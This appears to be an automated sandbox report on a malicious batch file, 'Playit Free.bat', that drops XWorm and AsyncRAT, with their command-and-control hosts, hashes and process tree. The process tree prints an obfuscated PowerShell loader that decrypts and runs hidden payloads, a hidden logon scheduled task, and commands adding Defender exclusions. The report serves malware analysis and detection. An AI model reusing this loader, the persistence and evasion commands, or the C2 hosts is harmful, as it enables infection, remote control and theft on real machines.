Analysis
  max time kernel: 146s
  max time network: 151s
  platform: windows10-2004_x64
  resource: win10v2004-20240508-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 04-07-2024 13:22
  Static task: static1
General
  Target: Playit Free.bat
  Size: 292KB
  MD5: 2bac01a226b5c7b08de93311ab9905d5
  SHA1: 48144153d2ca3d9cc7e27506b3d1923c9d80cc7a
  SHA256: bf73489935f2d196e04d1eb012f3c8ab16263fb3d005aac58d63322313db1186
  SHA512: 96f50b01f8c69befabbb307c5e4b58e304ec5d8339c9cca4bf927add6ec9f912ca4c87f5e13ec3c34737e47a7ab35d15de32c4b8b84c11e05dccfc9b5ce3f7f6
  SSDEEP: 6144:JLbgUUyQ6VV3W7bmjOk8Cl/iZYwD6rjwY+H+4hjhphHCxsu:JLbgPyQ6z3DOERkDUIHLlJu
Malware Config
Extracted
  Family: xworm
  C2 hosts:
    super-nearest.gl.at.ply.gg:17835
    best-bird.gl.at.ply.gg:27196
    wiz.bounceme.net:6000
  install_file: USB.exe
Extracted
  Family: asyncrat
  Botnet: Default
  C2 hosts:
    finally-grande.gl.at.ply.gg:25844
  delay: 1
  install: false
  install_folder: %AppData%
Signatures
-
Detect Xworm Payload (5 IoCs)
Processes (resource, yara_rule):
  behavioral1/memory/2124-16-0x00000164E4870000-0x00000164E48B8000-memory.dmp  family_xworm
  behavioral1/memory/4324-54-0x000001F1FC570000-0x000001F1FC58A000-memory.dmp  family_xworm
  C:\Users\Admin\AppData\Local\Temp\mshta.exe  family_xworm
  behavioral1/memory/4068-77-0x0000000000290000-0x00000000002A8000-memory.dmp  family_xworm
  behavioral1/memory/4068-124-0x000000001C060000-0x000000001C06E000-memory.dmp  family_xworm
-
Async RAT payload (2 IoCs)
Processes (resource, yara_rule):
  behavioral1/memory/2124-16-0x00000164E4870000-0x00000164E48B8000-memory.dmp  family_asyncrat
  C:\Users\Admin\AppData\Local\Temp\scvhost.exe  family_asyncrat
-
Blocklisted process makes network request (2 IoCs)
Processes (flow, pid, process):
  23  4324  powershell.exe
  32  4324  powershell.exe
-
Command and Scripting Interpreter: PowerShell (1 TTPs, 7 IoCs)
Run Powershell and hide display window.
Processes (pid, process):
  2124  powershell.exe
  4060  powershell.exe
  4324  powershell.exe
  4352  powershell.exe
  4112  powershell.exe
  3496  powershell.exe
  4536  powershell.exe
-
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes (description, ioc, process):
  Key value queried  \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation  WScript.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation  mshta.exe
-
Executes dropped EXE (2 IoCs)
Processes (pid, process):
  3404  scvhost.exe
  4068  mshta.exe
-
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow, ioc):
  19  ip-api.com
-
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class (1 IoCs)
Processes (description, ioc, process):
  Key created  \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings  powershell.exe
-
Suspicious behavior: EnumeratesProcesses (22 IoCs)
Processes (pid, process, number of events recorded):
  2124  powershell.exe  2
  4060  powershell.exe  2
  4324  powershell.exe  2
  4536  powershell.exe  3
  4352  powershell.exe  3
  4112  powershell.exe  3
  4068  mshta.exe       2
  3496  powershell.exe  3
  4324  powershell.exe  2
-
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes (token, pid, process):
  SeDebugPrivilege  2124  powershell.exe
  SeDebugPrivilege  4060  powershell.exe
  The following sequence is then recorded three times in a row for 4060 powershell.exe; the listing ends at token 35 of the third pass:
    SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
-
Suspicious use of SetWindowsHookEx (2 IoCs)
Processes (pid, process):
  4068  mshta.exe
  4324  powershell.exe
-
Suspicious use of WriteProcessMemory (26 IoCs)
Processes (source pid → target pid, source process → target process; each event is recorded twice):
  4056 → 1404  cmd.exe → cmd.exe
  4056 → 2124  cmd.exe → powershell.exe
  2124 → 4060  powershell.exe → powershell.exe
  2124 → 4748  powershell.exe → WScript.exe
  4748 → 3712  WScript.exe → cmd.exe
  3712 → 1044  cmd.exe → cmd.exe
  3712 → 4324  cmd.exe → powershell.exe
  4324 → 3404  powershell.exe → scvhost.exe
  4324 → 4068  powershell.exe → mshta.exe
  4068 → 4536  mshta.exe → powershell.exe
  4324 → 4352  powershell.exe → powershell.exe
  4068 → 4112  mshta.exe → powershell.exe
  4324 → 3496  powershell.exe → powershell.exe
Processes (indented by depth in the process tree)
- C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Playit Free.bat"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nkzg1mkfrHDUSX6khNCFu2GC0GRW40N8z0jb2WU/2wk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+SIhEEEdUoAvS3C0hLoK1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Eejjc=New-Object System.IO.MemoryStream(,$param_var); $rNGlN=New-Object System.IO.MemoryStream; $fjHYd=New-Object System.IO.Compression.GZipStream($Eejjc, [IO.Compression.CompressionMode]::Decompress); $fjHYd.CopyTo($rNGlN); $fjHYd.Dispose(); $Eejjc.Dispose(); $rNGlN.Dispose(); $rNGlN.ToArray();}function execute_function($param_var,$param2_var){ $BawPg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DvyFJ=$BawPg.EntryPoint; $DvyFJ.Invoke($null, $param2_var);}$FmsBL = 'C:\Users\Admin\AppData\Local\Temp\Playit Free.bat';$host.UI.RawUI.WindowTitle = $FmsBL;$LeiwM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FmsBL).Split([Environment]::NewLine);foreach ($OYikl in $LeiwM) { if ($OYikl.StartsWith('riSZShbqVrDJFHBMOGEs')) { $adCgQ=$OYikl.Substring(20); break; }}$payloads_var=[string[]]$adCgQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Signatures: Command and Scripting Interpreter: PowerShell; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_82_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_82.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_82.vbs"
      Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_82.bat" "
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nkzg1mkfrHDUSX6khNCFu2GC0GRW40N8z0jb2WU/2wk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+SIhEEEdUoAvS3C0hLoK1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Eejjc=New-Object System.IO.MemoryStream(,$param_var); $rNGlN=New-Object System.IO.MemoryStream; $fjHYd=New-Object System.IO.Compression.GZipStream($Eejjc, [IO.Compression.CompressionMode]::Decompress); $fjHYd.CopyTo($rNGlN); $fjHYd.Dispose(); $Eejjc.Dispose(); $rNGlN.Dispose(); $rNGlN.ToArray();}function execute_function($param_var,$param2_var){ $BawPg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DvyFJ=$BawPg.EntryPoint; $DvyFJ.Invoke($null, $param2_var);}$FmsBL = 'C:\Users\Admin\AppData\Roaming\Windows_Log_82.bat';$host.UI.RawUI.WindowTitle = $FmsBL;$LeiwM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FmsBL).Split([Environment]::NewLine);foreach ($OYikl in $LeiwM) { if ($OYikl.StartsWith('riSZShbqVrDJFHBMOGEs')) { $adCgQ=$OYikl.Substring(20); break; }}$payloads_var=[string[]]$adCgQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
          - C:\Users\Admin\AppData\Local\Temp\scvhost.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\scvhost.exe"
            Signatures: Executes dropped EXE
          - C:\Users\Admin\AppData\Local\Temp\mshta.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\mshta.exe"
            Signatures: Checks computer location settings; Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
            - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mshta.exe'
              Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
            - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mshta.exe'
              Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
            Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
            Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=2860,i,2607710392823067546,4648797561512801463,262144 --variations-seed-version --mojo-platform-channel-handle=4012 /prefetch:8
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 661739d384d9dfd807a089721202900b
  SHA1: 5b2c5d6a7122b4ce849dc98e79a7713038feac55
  SHA256: 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
  SHA512: 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 2KB
  MD5: 005bc2ef5a9d890fb2297be6a36f01c2
  SHA1: 0c52adee1316c54b0bfdc510c0963196e7ebb430
  SHA256: 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
  SHA512: f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 77d622bb1a5b250869a3238b9bc1402b
  SHA1: d47f4003c2554b9dfc4c16f22460b331886b191b
  SHA256: f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
  SHA512: d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: d65ebc84c6b0b52901fb46f5e2b83ab5
  SHA1: d036a0c3eb9e1616d0f7f5ca41171060c13a3095
  SHA256: d45581b0807a0d04a70ec75e3e4575e73f148e5b4e0d3d325dfbd6400a4bfbd1
  SHA512: 88ac232e7702ebd53788cf8429d266ae367111bfccf4bc9d40ead25b552347521458ca60d320e2775b5d2edcaf8501251cb2db68b38dc000ac50463fb80865be
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 12c844ed8342738dacc6eb0072c43257
  SHA1: b7f2f9e3ec4aaf5e2996720f129cd64887ac91d7
  SHA256: 2afeb7db4e46d3c1524512a73448e9cd0121deec761d8aa54fa9fe8b56df7519
  SHA512: e3de9103533a69cccc36cd377297ba3ec9bd7a1159e1349d2cc01ab66a88a5a82b4ee3af61fab586a0cdfab915c7408735439fd0462c5c2cc2c787cb0765766a
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_orr2a3kg.dmp.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- C:\Users\Admin\AppData\Local\Temp\mshta.exe
  Filesize: 70KB
  MD5: c5431c4b11742bc4ab73e896dd47153b
  SHA1: 16e6869c71d4ee978dfcc29b48f277f55828a331
  SHA256: bc404ae20b7085100cd7a7efddb28ce54014309bdbd60a5d57c135d44b950c4a
  SHA512: 888a843e81400b900fb5a36ff171b03149d2719406e778614809cfaaa7e81e2e9deb6807d01ff1cec7ed1db30b585121fc8606d2bc52ffc5fc4d86e9d2b12f37
- C:\Users\Admin\AppData\Local\Temp\scvhost.exe
  Filesize: 63KB
  MD5: 1ca366d46cb1726508257459a9cbbf3f
  SHA1: 183e7cd4165bd195cb05c7e474037f2a22707c67
  SHA256: 76bb01ad0452e2f834661d54744645a14d057be883ad51d2b447f8d6c48d5129
  SHA512: aec28910c3f2015ea252d9e2c1a497eec8fd3ef0bc4ff0bf42a593f159a3539df8ec7b01487def04099ca68040ec3d484492319b7bfbafedcbd7bcc2627e67be
- C:\Users\Admin\AppData\Roaming\Windows_Log_82.bat
  Filesize: 292KB
  MD5: 2bac01a226b5c7b08de93311ab9905d5
  SHA1: 48144153d2ca3d9cc7e27506b3d1923c9d80cc7a
  SHA256: bf73489935f2d196e04d1eb012f3c8ab16263fb3d005aac58d63322313db1186
  SHA512: 96f50b01f8c69befabbb307c5e4b58e304ec5d8339c9cca4bf927add6ec9f912ca4c87f5e13ec3c34737e47a7ab35d15de32c4b8b84c11e05dccfc9b5ce3f7f6
- C:\Users\Admin\AppData\Roaming\Windows_Log_82.vbs
  Filesize: 114B
  MD5: e39c831199e0dff67c3230b04f978409
  SHA1: 865806658353cb771d47bbf60c6942f57104c631
  SHA256: 9f35c6f9f6446ee00eb1bb7f9031f113f6c35c0322e0d2ef4ec7f82af7cf6398
  SHA512: ee355d5bbe6fdffc1f0fd705cb101cc01a41577da058ed3668fb6f0a44063b5f16df3718f4bee5ffcb4c66bec6869101061b87f74618872fd6e2609ee7f85dfd
Memory dumps (resource, filesize):
  memory/2124-55-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp  10.8MB
  memory/2124-14-0x00000164FEE90000-0x00000164FEF06000-memory.dmp  472KB
  memory/2124-1-0x00000164E4810000-0x00000164E4832000-memory.dmp  136KB
  memory/2124-11-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp  10.8MB
  memory/2124-12-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp  10.8MB
  memory/2124-16-0x00000164E4870000-0x00000164E48B8000-memory.dmp  288KB
  memory/2124-15-0x00000164E4860000-0x00000164E4868000-memory.dmp  32KB
  memory/2124-13-0x00000164FEA40000-0x00000164FEA84000-memory.dmp  272KB
  memory/2124-0-0x00007FFF009A3000-0x00007FFF009A5000-memory.dmp  8KB
  memory/3404-76-0x00000000006D0000-0x00000000006E6000-memory.dmp  88KB
  memory/4060-29-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp  10.8MB
  memory/4060-27-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp  10.8MB
  memory/4060-28-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp  10.8MB
  memory/4060-32-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp  10.8MB
  memory/4068-77-0x0000000000290000-0x00000000002A8000-memory.dmp  96KB
  memory/4068-124-0x000000001C060000-0x000000001C06E000-memory.dmp  56KB
  memory/4324-54-0x000001F1FC570000-0x000001F1FC58A000-memory.dmp  104KB